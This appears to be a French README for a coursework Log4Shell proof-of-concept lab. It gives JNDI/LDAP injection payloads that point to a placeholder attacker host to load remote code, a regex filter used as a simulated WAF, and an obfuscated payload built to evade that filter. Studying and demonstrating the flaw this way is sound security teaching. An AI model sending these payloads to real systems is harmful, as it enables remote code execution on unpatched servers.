
Preuve de concept pour la vulnérabilité Log4Shell (CVE-2021-44228), développé dans le cadre du travail de cours pour l'unité curriculaire TPAS du Master en sécurité de l'information à FCUP.
Ce dépôt contient une preuve de concept (PoC) pour la vulnérabilité Log4Shell (CVE-2021-44228), développée dans le cadre du cours de l'unité curriculaire TPAS du Master en Sécurité de l'Information à la FCUP.
Il comprend :
Pour exécuter cette pile, vous avez besoin de :
Une fois que tout est en cours d'exécution :
Placez cette charge utile dans la barre de recherche (encodée en URL car elle sera dans un paramètre de requête GET) :
%24%7Bjndi%3Aldap%3A%2F%2F<attacker_host_ip>%3A<ldap_port>%2FExploit%7D
Ou placez cette charge utile dans les en-têtes d'une requête (vous pouvez utiliser Burp Suite pour intercepter une requête et la modifier) :
${jndi:ldap://<attacker_host_ip>:<ldap_port>/Exploit}
Sur le site web, il y a une icône à côté du nom de l'utilisateur qui permet de basculer entre la désinfection de la chaîne enregistrée en utilisant l'expression régulière \$\{jndi:.*?} ou non. Par défaut, la désinfection est désactivée, représentée par une icône de démon rouge. Lorsque la désinfection est activée, l'icône change en un smiley vert.
Cette fonctionnalité peut être utilisée pour simuler un contournement WAF, vous pouvez ajouter d'autres expressions régulières dans la classe LoggerManager.java du backend.
Voici une charge utile qui ne sera pas détectée par l'expression régulière actuelle :
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<attacker_host_ip>:<ldap_port>/Exploit}